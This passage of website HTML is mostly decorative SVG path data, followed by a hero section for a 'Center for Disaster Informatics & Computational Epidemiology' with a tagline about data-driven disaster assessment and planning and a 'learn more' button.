d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h35\" class=\"h-x-container style-864 style-local-22-h35 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h35-group style-864-spacing style-local-22-h35-spacing\"><span class=\"h-button__outer style-865-outer style-local-22-h36-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/?page_id=126\" data-colibri-id=\"22-h36\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-865 style-local-22-h36 position-relative\"><!----><!----> <span>learn more</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h29-outer\">\n <div data-colibri-id=\"22-h29\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 